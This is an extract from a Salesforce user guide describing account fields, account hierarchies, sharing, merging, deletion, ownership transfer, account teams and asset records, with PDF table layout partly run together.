
Mailing Zip/Postal Code

Cellular or mobile phone number. Up to
40 characters are allowed in this field.

Mobile

User who last changed the account fields,
including modification date and time.

Modified By

This does not track changes made to any
of the related list items on the account.
(Read only)

City portion of additional address. Up to
40 characters are allowed in this field.

Other City

Country portion of additional address.
Up to 80 characters are allowed in this
field.

Other Country

777

Account FieldsManaging the People and Organizations You Sell To



Is Contact FieldDescriptionField

Another country for the address. Entry
is selected from a picklist of standard
values.

Other Country (beta)

Additional phone number listing. Up to
40 characters are allowed in this field.

Other Phone

State or province portion of additional
address. Up to 80 characters are allowed
in this field.

Other State/Province

Another state or province for the address.
Entry is selected from a picklist of
standard values.

Other State/Province (beta)

Street address portion of additional
address. Up to 255 characters are allowed
in this field.

Other Street

Zip or postal code portion of additional
address. Up to 20 characters are allowed
in this field.

Other Zip/Postal Code

Ownership of company, for example,
public or private. Entry is selected from

Ownership

a picklist of available values, which are
set by an administrator. Each picklist
value can have up to 40 characters.

Primary phone number of account. Up
to 40 characters are allowed in this field.

Phone

Categorization of how you rate this
account, for example, Hot, Cold. Entry

Rating

is selected from a picklist of available
values, which are set by an administrator.
Each picklist value can have up to 40
characters.

Title for addressing the person, for
example, Mr., Ms., Dr., or Prof. Entry

Salutation

is selected from a picklist of available
values, which are set by an administrator.
Each picklist value can have up to 40
characters.

City portion of primary mailing or
shipping address. Up to 40 characters are
allowed in this field.

Shipping City

Country portion of primary mailing or
shipping address. Up to 80 characters are
allowed in this field.

Shipping Country
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Is Contact FieldDescriptionField

The shipping country for the address.
Entry is selected from a picklist of
standard values.

Shipping Country (beta)

State or province portion of primary
mailing or shipping address. Up to 80
characters are allowed in this field.

Shipping State/Province

The shipping state or province for the
address. Entry is selected from a picklist
of standard values.

Shipping State/Province (beta)

Primary mailing or shipping street
address of account. Up to 255 characters
are allowed in this field.

Shipping Street

Zip or postal code portion of primary
mailing or shipping address. Up to 20
characters are allowed in this field.

Shipping Zip/Postal Code

Standard Industrial Classification code
of the account’s main business

SIC Code

categorization. Up to 10 characters are
allowed in this field.

The territories to which the account has
been assigned. See Territory
Management Overview on page 972.

Territories

The abbreviation used to identify publicly
traded shares of a particular stock. Also

Ticker Symbol

known as the stock symbol. Up to 20
characters are allowed in this field.

Person's position within his or her
organization. Up to 80 characters are
allowed in this field.

Title

Type of account, for example, Customer,
Competitor, or Partner. Entry is selected

Type

from a picklist of available values, which
are set by an administrator. Each picklist
value can have up to 40 characters.

URL of account’s website, for example,
www.acme.com. Up to 255 characters

Website

are allowed in this field; only the first 50
are displayed.

See Also:
Accounts Overview
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Viewing Parent Accounts
Available in: All Editions except Database.com

User Permissions Needed

“Read” on accountsTo view accounts:

“Read” on accountsTo view parent accounts:

The account hierarchy shows you the accounts that are associated through the Parent Account field, giving you a global
view of a company and its subsidiaries. In the hierarchy, accounts are indented to show that they are subsidiaries of the parent
account above them.

• To view the account hierarchy, click View Hierarchy next to the account name on the account detail page. The Account
Hierarchy page displays up to 500 child accounts. If you don’t have access to certain accounts that appear on the Account
Hierarchy page, the columns for those accounts won’t display details.

• To list an account as a subsidiary, edit the subsidiary account and type the name of an existing account in the Parent
Account field. Alternatively, you can click the lookup icon to search for (or optionally, create) a parent account.

The parent account must be an existing account before it can be entered and saved in this field.

For companies with multiple office locations, you can also use the Account Site field to distinguish among the locations.

If your organization uses divisions, accounts that are associated via the Parent Account field do not need to be in the same
division.

The Parent Account field and the View Hierarchy link are not supported for person accounts.

See Also:
Account Fields
Guidelines for Creating Accounts

Sharing Accounts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Your administrator defines your organization's sharing model as well as your organization's default account access levels for
territories. However, you can extend sharing privileges for your own data on an account-by-account basis. You can use account
sharing to increase access to your accounts; you cannot restrict access beyond your organization’s default access levels.

To view and manage sharing details, click Sharing on the account detail page. The Sharing Detail page lists the users, groups,
roles, and territories that have sharing access to the account. On this page, you can do any of the following:

• Click Add to grant access to the record for other users, groups, roles, or territories.
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Note:  When you share an account, Salesforce prompts you to share any related contacts, opportunities, or cases,
up to and including your access level. Enterprise, Unlimited, and Developer Edition users can also share related
records from the record detail pages. Ensure users have at least “Read” permission on shared records.

Alternatively, you can share account access by creating an account team.

• Click Expand List to view all users that have access to the record.

• For manual sharing rules that you created, click Edit or Del next to an item in the list to edit or delete the access level.
For accounts, you can also edit the “Owner” sharing rule.

See Also:
Territory Management Overview
Account Teams Overview

Merging Duplicate Accounts
Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on accountsTo view accounts:

“Delete” on accountsTo merge business accounts:

“Delete” on accounts

AND

“Read” on contacts

To merge person accounts:

1. From the Accounts tab, click Merge Accounts in the Tools section.
2. Enter a search string to find the duplicate accounts.

For example, you can enter acme* to find duplicate accounts listed as “Acmes” and “Acme, Inc.” Do not use the local name
for the account. Then click Find Accounts.

3. Check the rows of up to three accounts you want to merge. Click Next.
4. Select one account as the “Master Record.” Any data in hidden or read-only fields will be taken from the Master Record.

If you have “Edit Read Only Fields” permission, you can manually select which read-only fields to retain. Note that hidden
fields are not displayed during the merge.

5. Select the fields that you want to retain from each record.

When there is conflicting data, the fields in the left column are preselected and the row is marked in blue.

6. Click the Merge button to complete the merge.

781

Merging Duplicate AccountsEstablishing Your Customers, Competitors, and Partners



Tips on Merging Accounts

• You can merge accounts if you are an administrator, the account owner, or a user above the account owner in the role
hierarchy and you have the appropriate user permissions.

• When merging two accounts that you do not own, you must have “Delete” permissions on accounts and “Edit” permissions
on opportunities and cases. You need “Delete” permissions on accounts because you are deleting one of the accounts when
you perform an account merge. You need “Edit” permissions on opportunities and cases because changing the account
name field (AccountID) edits any opportunities or cases that are associated with the accounts you are merging.

• Any related items from any of the duplicate accounts will be associated with the newly merged account.
• In Professional, Enterprise, Unlimited, and Developer Edition organizations, any sharing rules are applied to the newly

merged account. Also, any manual sharing from the “Master Record” is applied to the merged account.
• When you merge accounts that are listed in the Parent Account field of other accounts, the newly merged account is

linked only to the accounts of the selected Master Record.
• All discarded duplicate records are moved to the Recycle Bin.
• The newly merged account displays the Created By date from the oldest account you are merging, and shows the merge

date as the Modified By date.
• If both accounts have different account teams, the merged account will contain members from both account teams.
• In organizations that use divisions, the merged account is assigned to the division of the Master Record, unless you select

otherwise.
• When you merge accounts that have territories and the Exclude from account assignment rules box was

deselected on both of the original accounts, account assignment rules will run on the new account to determine its territories.
Also, any manually added territories on the original accounts will be manually added to the new account.

• When you merge accounts that have territories and the Exclude from account assignment rules box was checked
on one or both of the original accounts:

◊ The newly merged account has all of the territories of the original accounts.
◊ Account assignment rules will not run on the newly merged account.
◊ If a territory was assigned to one of the original accounts based on account assignment rules, it will appear as having

been assigned to the new account based on rules even if the new account does not match the rules.
◊ If a territory was manually assigned to one of the original accounts, it will be manually assigned to the new account.
◊ If a territory was added to one account manually and to the other account by rules, it will be manually added to the

new account.

• When you merge accounts, you also merge the accounts’ memberships in relationship groups.

Tips on Merging Person Accounts

• If your organization uses person accounts, both business accounts and person accounts are returned when you search for
duplicates. However, you cannot merge a person account with a business account or vice versa. Person accounts are indicated
by the person account icon ( ).

• You can't merge person accounts enabled to use a Customer Portal.

Tips on Merging Accounts Associated with Portals

• You must have the “Manage Users” permission to merge accounts associated with portals.
• You can merge accounts that have contacts associated with the same type of portal. For example, you can merge accounts

that have contacts associated with a partner portal or Customer Portal, but you cannot merge an account that has contacts
associated with a partner portal with an account that has contacts associated with a Customer Portal.

When you merge accounts that have contacts associated with multiple portals of the same type, a contact's access to a
specific portal does not change. This is because a portal user's profile determines the portal he or she can access.

• When merging a partner account with a non-partner account, the partner account must be the master.

782

Merging Duplicate AccountsManaging the People and Organizations You Sell To



• When merging partner accounts with a non-partner account, the owner cannot be changed.
• To ensure that merged accounts will include contacts associated with a portal, select the account with portal users as the

master record during the merge process.

See Also:
Merging Accounts Associated with Relationship Groups

Merging Accounts Associated with Relationship Groups
Available in: Salesforce for Wealth Management

User Permissions Needed

“Delete” on accountsTo merge business accounts:

“Delete” on accounts, “Read” on contactsTo merge person accounts:

When working with wealth management accounts (clients), you can merge up to three duplicate accounts at a time. For
example, if the accounts “Joe Bannon” all represent the same client and need to be merged, you can use the Merge Accounts
tool to consolidate those records into one. Note that merging results in a single account, and an account cannot exist more
than once in the same relationship group. Review the following considerations before merging accounts that are members of
relationship groups:

• The account you select as the master record retains its original relationship group memberships. For example, if the master
record “Joseph Bannon” was a member of the “Bannon Family” and “Bannon Law Firm” relationship groups, it remains
a member of those relationship groups.

• The master record replaces the non-master records in all other relationship groups involved in the merge. For example, if
the non-master record “Joe Bannon” was a member of “Bannon Trust Beneficiaries,” the master record is transferred Joe
Bannon's membership in Bannon Trust Beneficiaries.

• If there is a relationship group to which the master record did not originally belong but the multiple non-master records
belong, the master record is transferred the membership of the non-master account that had higher priority (primary versus
secondary) or the account whose member record was most recently modified in the relationship group. For example, if the
non-master records “JR Bannon” and “Joe Bannon” both were members of “Acme LLP” and JR Bannon was primary, then
the master record is transferred JR Bannon's membership in Acme LLP. Alternatively, if neither JR Bannon or Joe Bannon
were primary or secondary but JR Bannon's member record in the relationship group was modified more recently, then
the master record would be transferred JR Bannon's membership in Acme LLP.

See Also:
Merging Duplicate Accounts
Removing Members from Relationship Group Members
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Adding Translated Names
Available in: Professional, Enterprise, Unlimited, and Developer Editions

A local name stores a translated value for a corresponding account, contact, or lead field. For example, you can store the name
of an account in the default language of your organization as well as the account’s or user’s language. The following fields can
have corresponding local names:

Local Name FieldStandard Field

Account Name (Local)Account Name

Contact: First Name (Local)Contact: First Name

Contact: Last Name (Local)Contact: Last Name

Lead: Company Name (Local)Lead: Company

Lead: First Name (Local)Lead: First Name

Lead: Last Name (Local)Lead: Last Name

Local names do not affect the user’s language settings. Depending on your page layout settings, they can both be displayed
on the detail or edit page.

Understanding What Happens when You Delete Accounts
Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on accountsTo view accounts:

“Delete” on accountsTo delete accounts:

Deleted accounts are moved to the Recycle Bin, along with these associated items.

• Contacts

• Opportunities

• Contracts (if they're not activated)

• Activities

• Notes

• Attachments

• Portal roles and groups (if all portal users in the account are disabled.)
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• Partner relationships

• Relationship group members

If you restore an account from the Recycle Bin, any related items are also restored except for:

• Relationship group members in some cases. See Removing Members from Relationship Group Members on page 847.

• Portal roles and groups. See Using Accounts on page 763.

You can’t delete an account if it has been enabled as a partner account; it has associated cases, activated contracts, or related
opportunities that are owned by other users; or associated contacts are enabled for the Self-Service portal. In addition, if you
attempt to delete an account that has closed/won opportunities owned by you, a message displays asking you whether you
want to delete the closed/won opportunities along with the account or to cancel the account deletion.

Note:  You can delete an account if you are an administrator, the account owner, or a user above the account owner
in the organization role hierarchy, and if you have the appropriate user permission. You do not need the “Delete”
permission on any associated records that are included in the deletion.

See Also:
Merging Duplicate Accounts

Changing Ownership
Available in: Contact Manager, Group, Professional, Enterprise Unlimited, and Developer Editions

User Permissions Needed

“Transfer Record”To transfer single records:

If you want to transfer a record to a new owner, the new owner must have at least “Read” permission on the object.

1. In the object detail page, click Change next to the Owner field.

If you don’t see the Change link, you don’t have permissions to change record ownership.

2. Enter or select a new owner. In organizations where the Salesforce Customer Portal or partner portal is enabled, you can
filter the results that appear on the user lookup dialog by selecting either a queue or group of users from the Owner or
Assigned To drop-down list.

Note:  Only users you are able to transfer ownership to are visible. Neither the User group nor the Roles and
Internal Subordinates group contains Customer Portal or partner users.

3. Select the Send Notification Email checkbox to notify the new owner.

The “From” email address displayed in the notification is your return email address set in your email settings.

For cases in Professional, Enterprise, Unlimited, and Developer Edition organizations, the email text is determined by the
Case Assigned Template setting specified in the Support Settings. For other records, the email text is automatically
generated and cannot be customized.
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4. Depending on the type of object you are transferring and your user permissions, the following checkboxes may also appear:

Appears ForDescriptionCheckbox

Accounts and leads, if you
can view or edit the
Division field

Transfers the record to the new owner's division. All records
related to the account are transferred to the new division as
well.

Change Division

AccountsTransfers open opportunities owned by other users that are
associated with the account.

Transfer open
opportunities not
owned by the existing
account owner

AccountsTransfers the closed opportunities associated with the
account. This option applies only to closed opportunities

Transfer closed
opportunities

owned by the account owner; closed opportunities owned
by other users are not changed.

AccountsTransfers any open cases associated with the account that
are owned by the existing account owner.

Transfer open cases
owned by the existing
account owner

AccountsTransfers the closed cases associated with the account. This
option applies only to closed cases owned by the account
owner; closed cases owned by other users are not changed.

Transfer closed cases

AccountsTransfers all account team members on the account to the
new owner.

Keep Account Team

OpportunitiesPreserves the opportunity team when the opportunity is
transferred to the new owner. Any opportunity splits are

Keep Opportunity Team

preserved, and split percentages assigned to the previous
owner transfer to the new one. If this box is unchecked, all
opportunity team members and splits are deleted when the
opportunity is transferred.

Note:  If you transfer closed opportunities, the
opportunity team is maintained, regardless of this
setting.

Note:  If you change an account owner with both Transfer closed opportunities and Keep Opportunity
Team deselected, the opportunity team members’ access for closed opportunities becomes Private (that is, the
opportunity team members lose access to any closed opportunities).

5. Click Save to finish.

After you change a record’s owner, the previous owner’s visibility reverts to the default sharing setting unless that user is on
an account or opportunity team. For example, if the previous owner of an account is on an account team, that user has Read
Only or the access specified in your organization-wide default for accounts, whichever is greater. The previous owner’s access
to related records remain the same. This behavior is the same for opportunity owners that are members of an opportunity team

786

Changing OwnershipManaging the People and Organizations You Sell To



as long as you change ownership using the API. When you change ownership of an opportunity within Salesforce, you can
select the access level you want.

See Also:
Transfer of Associated Items

Transfer of Associated Items
Available in: Contact Manager, Group, Professional, Enterprise Unlimited, and Developer Editions

When you change record ownership, some associated items that are owned by the current record owner are also transferred
to the new owner.

Important: Workflow rules that update owners do not also transfer associated items. To ensure transfer, click Change
next to the owner’s name in a record and make your transfer selections.

Associated items that are also transferredRecord Type

Contacts, contracts with “Draft” status, attachments, notes, and open activities. Depending
on your selections, this can also include open opportunities not owned by the current account

Accounts

owner, closed opportunities, open cases owned by the existing account owner, and closed
cases.

When a partner account is transferred, partner users associated with that account are moved
into the role hierarchy beneath the new owner.

Contracts with “Activated” status are not transferred to the new owner, however, the new
owner has read-only access to these contracts.

Notes, attachments, and open activitiesContacts

Notes, attachments, and open activitiesOpportunities

Notes, attachments, and open activities. Open activities are not transferred if you change lead
ownership using the Assign using active assignment rule checkbox.

Leads

Notes, attachments, and open activitiesCases

Attachments and open activitiesCampaigns

Notes, attachments, and open activitiesContracts

Notes, attachments, and open activitiesCustom objects
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Note:  You can't transfer events to which you have been invited and don't own.

See Also:
Changing Ownership

Finding Account-Related Information (Related Lists)
Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on accountsTo view accounts:

“Edit” on accountsTo edit business accounts:

“Edit” on accounts and contactsTo edit person accounts:

“Manage External Users”To enable partner accounts:

“Edit” on accounts

AND

“Manage External Users”

To disable partner accounts:

“Edit” on accounts

AND

“Edit Self-Service Users”

To disable Customer Portal accounts:

Related lists, such as opportunities, display information related to an account.

• Hover over the links at the top of a detail page to display the corresponding related list and its records. If Chatter is enabled,
hover links display below the feed. An interactive overlay allows you to quickly view and manage the related list items.
Click a hover link to jump to the content of the related list. If hover links are not enabled, contact your Salesforce
administrator.

• If hover details are enabled, hover over any lookup field on the detail page to view key information about a record before
clicking into that record’s detail page.

• To directly add new items, click New (or the equivalent button) at the top of a related list. For example, to add a task to
the Open Activities related list, click New Task.

• To change the number of records shown for related lists, click View More below a related list, or click fewer or more at
the bottom of the page.

• If you are unable to see related records that belong to portal users, contact your Salesforce administrator.
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Viewing Related Lists

The related lists you see are determined by your:

• Personal customization
• Administrator's page layout customizations
• Permissions to view related data

The kind of account you are viewing—a business account or a person account—also determines the related lists that can be
viewed.

WORKING TOGETHER ON ACCOUNTS

Account Teams Overview
Available in: Enterprise, Unlimited, and Developer Editions

An account team is a team of users that work together on an account. For example, your account team may include an executive
sponsor, dedicated support representative, and project manager.

You can build an account team on each account that you own. When selecting an account team member, choose a role to
indicate the role the person plays on the account. Also, depending on your sharing model, you can specify the level of access
each account team member will have to the account and any contacts, opportunities, or cases associated with that account. So,
you can give some team members read-only access and others read/write access.

You can also set up a default account team. Your default account team should include the users that you normally work with
on your accounts. You have the option to automatically add your default account team to all of your accounts.

In a custom list view, you can filter account lists by the account teams in which you are a member. When creating or editing
a custom list view for accounts, simply select the My Account Teams filter. In account reports, you can filter accounts by
the account teams in which you are a member.

Note:  Account teams are not the same as opportunity teams, although they share the same set of available team
member roles. Account teams work together on accounts, while opportunity teams work together on opportunities.

See Also:
Setting Up Account Teams
Setting Up Default Account Teams
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Setting Up Account Teams
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To enable account teams:

“Customize Application”To set up team roles:

Your users can add account team members to accounts. Similar to opportunity teams on opportunities, account teams are
teams of users who work together on accounts.

To access the Account Team Setup page, from Setup, click Customize > Accounts > Account Teams. On the Account Team
Setup page, click the appropriate links to perform the following actions.

Defining Team Roles

Every member of an account team has a role that he or she plays for the account, for example, “Account Manager” or “Project
Manager.” You can customize the account team roles for your organization:

1. Click Team Roles.
2. Edit the existing entries or add new items.
3. Click Save.

Replacing Team Roles

If you have changed your team roles and want to update all existing records, click Replace Team Roles to globally replace the
picklist values in all existing records.

Note:  Account teams share roles with the opportunity teams on opportunities. If you remove an account team role,
that role will no longer be listed as an opportunity team role.

Enabling or Disabling Account Teams

To enable or disable account teams:

1. Click Enable Account Teams or Disable Account Teams.
2. Select or deselect the Account Teams Enabled checkbox and click Save. Enabling account teams gives your users

access to create and use account teams on accounts.
3. If you are enabling account teams, select the account page layouts that should include the new Account Team related list

and click Save.
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Note:  Disabling account teams removes all account teams from all accounts and removes the Account Team related
list from all page layouts.

In addition, you cannot disable account teams for your organization if team members are referenced in Apex. For
example, if Apex code references the Team Member field (represented as AccountTeamMember in the code), account
teams cannot be disabled.

See Also:
Account Teams Overview
Setting Up Default Account Teams

Setting Up Default Account Teams
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on opportunitiesTo set up default account teams:

“Read” on accounts

AND

Owner of account record, or above owner in your
organization's role hierarchy

To add default account teams to accounts:

An account team is a team of users that work together on an account. For example, your account team may include an executive
sponsor, dedicated support representative, and project manager.

Adding Default Account Team Members

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Personal Information > Personal Information.
• If you clicked My Settings, select Personal > Advanced User Detail.

.
3. Click Add in the Default Account Team related list.
4. Select users to add as members of your default account team.
5. Select the access levels that each member should have on the accounts you own and the contacts, opportunities, and cases

related to those accounts.

The access levels of the records can only grant the same or wider access than your organization’s default access. However,
at least one of the access levels must be set to a wider access than the organization’s defaults. For example, if the
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organization-wide defaults for your contacts, opportunities, and cases are set to Private, then at least one of them must be
set to a wider access for the account team members.

Contact Access is not available when the organization-wide default for contacts is set to Controlled by Parent.

6. Select an account team role for each member, for example, “Channel Manager.”
7. Check the Automatically add my default account team... box to add your default account team to all accounts

that you create and all accounts that are transferred to you.
8. Check the Update account teams... box to apply default account team changes to all of your existing accounts.
9. Click Save.

Editing and Deleting Default Account Team Members

To change the access levels or role of a default team member, click Edit next to the user’s name in the Default Account Team
related list.

To delete a user from your default account team:

1. Click Del next to the user’s name in the Default Account Team related list.
2. Select Remove this user... to remove the user from your existing account teams.
3. Click Delete to finish.

To change or remove a default team member for a specific account, go to the Account Team related list on that account.

See Also:
Account Teams Overview
Setting Up Account Teams

Adding Account Team Members
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on accounts

AND

Owner of account team record, or above owner in your
organization's role hierarchy

To add team members from an account:

“Read” on accountsTo view accounts:

To build an account team, you select an account and add account team members to it. High-volume portal users can’t be added
to teams.

Note:  The Account Access, Contact Access, Opportunity Access, and Case Access options depend on your sharing
model. In a Public sharing model, you may only have one option. Contact Access is not available when the
organization-wide default for contacts is set to Controlled by Parent. Regardless of sharing access, account team
members must also have the “Read” permission on accounts to view accounts that list them as members.
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1. View the account.
2. Click Add in the Account Team related list.
3. Select users to add to the account team. To add your default account team to an account, click Add Default Team in the

Account Team related list. To add all account team members to an opportunity, click Add Account Team from the
Opportunity Team related list on the opportunity.

4. Select the type of access each member should have to the account's related records. The access level cannot be less restrictive
than your organization’s default account access level.

5. Select a team role for each member.
6. Click Save.

Tip: In a custom list view, you can filter account lists by the account teams in which you are a member. When creating
or editing a custom list view for accounts, simply select the My Account Teams filter. In account reports, you can
filter accounts by the account teams in which you are a member.

See Also:
Account Team Fields

Editing Account Team Members
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on accountsTo view accounts:

“Edit” on accounts

AND

Owner of account team record, or above owner in your
organization's role hierarchy

To edit team members:

For each account you own or have access to, you can change the access level and role of any member.

Note:  If a team member is on your default account team and you modify his or her properties for a specific account,
those changes affect only that account. The setup of your default account team doesn't change.

1. View the account.
2. To add team members, click Add or Add Default Team on the Account Team related list.
3. To edit a team member's access, click Edit next to the member's name and select a different access level for the account

and its related contacts, opportunities, and cases.

The access levels of the records can only grant the same or wider access than your organization’s default access. However,
at least one of the access levels must be set to a wider access than the organization’s defaults. For example, if the
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organization-wide defaults for your contacts, opportunities, and cases are set to Private, then at least one of them must be
set to a wider access for the account team members.

4. To edit a team member's role, click Edit next to the member's name and select a different role.
5. Click Save.

Tip:  Click Display Access in the Account Teams related list to show the organization-wide sharing settings related
to accounts. These settings may allow greater access than those specified when the user was added to the account
team. For example, if your company's organization-wide sharing setting for accounts is Read/Write, that setting will
override a Read Only setting for an individual member of an account team. Contact access is not available when the
organization-wide default access for contacts is set to Controlled by Parent.

See Also:
Account Team Fields

Removing Account Team Members
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on accountsTo view accounts:

“Edit” on accounts

AND

Owner of account record, or above owner in your
organization's role hierarchy

To remove team members:

For each account you own, you can remove any team member from the account team.

1. View the account.
2. Click Del next to the member’s name in the Account Team related list.

Click Delete All if you want to remove all the account team members at once.

3. Select Remove if you also want to remove the user from the opportunity teams of open opportunities associated with the
account.

4. Click Delete to finish.

Note:  Unless specified, removing a member of your account team does not remove that person from your opportunity
teams.

If a team member is on your default account team and you remove him or her from a specific account, those changes
only affect that account. The setup of your default account team does not change. To remove users from your default
account team, see Setting Up Default Account Teams on page 791.
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If a user on an account team has Read/Write access (Account Access, Contact Access, Opportunity Access, and
Case Access) and is deactivated, the access will default to Read Only if the user is reactivated.

See Also:
Account Teams Overview

Account Team Fields
Available in: Enterprise, Unlimited, and Developer Editions

An account team member has the following fields, listed in alphabetical order. Depending on your page layout and field-level
security settings, some fields may not be visible or editable.

DescriptionField

The level of access that a team member has to the account.
The access level can be read/write or read only, but it cannot
be less than your organization’s default account sharing access.

Account Access

The level of access that a team member has to the contact.
The access level can be read/write or read only, but it cannot
be less than your organization’s default contact sharing access.

Contact Access is not available when the organization-wide
default for contacts is set to Controlled by Parent.

Contact Access

The level of access that team member has to the opportunities
associated with the account.

Opportunity Access

The level of access that team member has to the cases
associated with the account.

Case Access

The user listed as part of the team.Team Member

The role that the team member plays for the account, for
example, “Account Manager.”

Team Role

See Also:
Adding Account Team Members
Editing Account Team Members
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TRACKING THE PRODUCTS YOUR CUSTOMERS BUY

Assets Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

While products represent the items that your company sells, assets represent the specific products your customers have purchased,
including a serial number, date of purchase, or any other information related to an individual sale. Depending on how your
organization uses assets, they can represent a competitor product that your customer has or versions of your products.

Use assets to store specific information about the products your customers have. Depending on your page layouts, you can
view asset related lists on your account, contact, and product page layouts.

If set up by an administrator, your customers may be eligible for support based on an asset they've purchased.

See Also:
Getting Started with Assets
Viewing Asset Lists

Getting Started with Assets
Available in: Professional, Enterprise, Unlimited, and Developer Editions

If your organization has enabled products, assets are automatically enabled for your organization. However, administrators
still need to customize their organization before users can begin using assets. To implement assets for your organization:

• Add the Assets related list to account, contact, and product page layouts. Users can create new assets from these related
lists.

• Add the Cases related list to the appropriate product and asset page layouts.

• Add the Asset field to your case page layouts. Consider changing the field-level security for the Asset field so that it
displays or is required if necessary for your business.

• By default, your users have “Read,” “Create,” “Edit,” and “Delete” permissions on assets. If necessary, revise these permissions
for your users. Without the “Read” permission on assets, users will not see any assets or asset related lists in Salesforce.

• Optionally, customize asset fields and page layouts from Setup by clicking Customize > Assets.

See Also:
Assets Overview
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Viewing Asset Lists
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on assetsTo view assets:

“Edit” on assetsTo change assets:

Display a list of assets by going to the Products tab and clicking a view from the Asset Views section. To show a filtered list
of items, select a predefined list from the View drop-down list, or click Create New View to define your own Custom view.
To edit or delete any view you created, select it from the View drop-down list and click Edit.

• Click an asset name to view the detail. Click Edit or Del to edit or delete the asset. For information on deleting assets,
see Deleting Assets on page 801.

• If Chatter is enabled, click  or  to follow or stop following an asset in your Chatter feed.

See Also:
Assets Overview

Displaying and Editing Assets
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on assetsTo view assets:

“Edit” on assetsTo change assets:

You can display an asset from the Products tab or a related account or contact.

Displaying Assets

Once you have located an asset from a related list, or the products home or list pages, click the name to display detailed
information. If hover details are enabled, hover over any lookup field on the detail page to view key information about
a record before clicking into that record’s detail page.

Viewing Asset Updates and Comments (Chatter)

Display a Chatter feed of updates, comments, and posts about the asset.
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Editing Assets

• Use inline editing to edit fields directly on the detail page. If inline editing isn’t enabled, contact your administrator.

• To display the page in edit mode, click Edit, make your changes, and click Save.

Asset Related Lists

Below the asset detail are related lists that include information about associated cases, entitlements, activities, or notes
and attachments. The related lists you see are determined by your personal customization and any customization your
administrator has made to page layouts. Click on individual items to display additional information about them. Click
more at the bottom of the page or View More below a related list to display more items.

Note: Hover over the links at the top of a detail page to display the corresponding related list and its records.
If Chatter is enabled, hover links display below the feed. An interactive overlay allows you to quickly view and
manage the related list items. Click a hover link to jump to the content of the related list. If hover links are not
enabled, contact your Salesforce administrator.

Printing Assets

To open a printable display of the record details, in the top-right corner of the page, click Printable View.

To return to the last list page you viewed, click Back to list at the top of the asset detail page. If your organization has enabled
collapsible page sections, use the arrow icons next to the section headings to expand or collapse each section on the detail page.

You can enter person accounts in either the Account or Contact fields of an asset. The Assets related list on a person account
includes all assets related to the person account, including those where the person account is in the Contact field.

Note:  Users can view an asset if they can view the account or contact listed on the asset. However, sharing settings
may prevent users from viewing the account associated with the contact on the asset.

See Also:
Asset Fields
Viewing Asset Lists

Creating Assets
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on assetsTo view assets:

“Create” on assetsTo create assets:

1. Click New on the Assets related list of an account, contact, or product. This action automatically inserts the account name,
contact name or product name, depending on the record you selected when you clicked New.
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2. To associate the asset with a product, enter the exact product name. If the product name is unique, Salesforce automatically
inserts this name in the Asset Name field.

If you do not know the name of the product:

a. Click the Product lookup icon if the asset is based on a product.
b. Enter a search filter to find a current product, and click Go!.
c. Select the appropriate product. Salesforce automatically inserts the selected product name in the Asset Name field.

3. Enter a name for the asset.
4. Choose the account or contact for the customer who has purchased the asset.

If necessary, you can choose both an account and a contact that are not related. The asset will display on the contact selected
on the asset as well as the account selected on the asset, however, it will not display on the account of the contact. If you
only choose a contact, the asset will display on both the contact and the contact's account.

5. To create an asset for a competitor’s product, check Competitor Asset.
6. Click Save.

You can enter person accounts in either the Account or Contact fields of an asset. The Assets related list on a person account
includes all assets related to the person account, including those where the person account is in the Contact field.

See Also:
Asset Fields
Cloning Assets

Cloning Assets
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on assetsTo view assets:

“Create” on assetsTo create and clone assets:

Use the Clone button on an asset to quickly create a new asset with the same information as the selected asset. To clone an
asset for your organization:

1. Click Clone on an existing asset.
2. Enter or change any information for the new asset.
3. Click Save.
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Note:  If you have read-only access to a field, the value of that field is not carried over to the cloned record.

See Also:
Asset Fields

Asset Fields
Available in: Professional, Enterprise, Unlimited, and Developer Editions

An asset has the following fields, listed in alphabetical order. Depending on your page layout and field-level security settings,
some fields may not be visible or editable.

DescriptionField

Division to which the asset belongs. This value is automatically
inherited from the related account if any. Otherwise the value

Asset Division

is inherited from the related contact. Available only in
organizations that use divisions to segment their data.

Identifying name for the asset. If you select a product from the
product lookup, this name is automatically populated with the
product name.

Asset Name

Account associated with the asset. Each asset must be
associated with an account or contact.

Account

Contact associated with the asset. Each asset must be associated
with an account or contact. If you choose both an account and

Contact

contact, they do not need to be related to each other. Contacts
that are not associated with an account cannot be linked to
assets.

Checkbox to indicate if the asset represents a competitor’s
product. Use assets to track what customers have your
competitor’s products using this checkbox.

Competitor Asset

Text that distinguishes this asset from others.Description

Date the customer installed the asset.Install Date

Amount the customer paid for the asset.Price

The product on which the asset is based.Product

Date the customer bought the asset.Purchase Date

The number of assets purchased.Quantity
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DescriptionField

The model number on the asset.Serial Number

State of the asset.Status

The date the asset expires or the last date it is under warranty.
Use this field to store whatever date is appropriate for your
business.

Usage End Date

See Also:
Creating Assets
Cloning Assets

Deleting Assets
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on assetsTo view assets:

“Delete” on assetsTo delete assets:

“Delete” on assetsTo recover deleted assets:

Since assets are related to account and contact records, you can delete them from those records or individually using the
Products tab. Before you delete an asset, review the following scenarios:

• Is the asset associated with a case?

Assets associated with cases cannot be deleted. This includes deleting an account or contact record that is associated with
an asset listed on a case.

• Is the asset associated with a product?

When an asset is based on a product, deleting the product does not delete the asset.

• Is the asset associated with an account or contact?

If you delete an account or contact, all associated assets are also deleted and moved to the Recycle Bin.

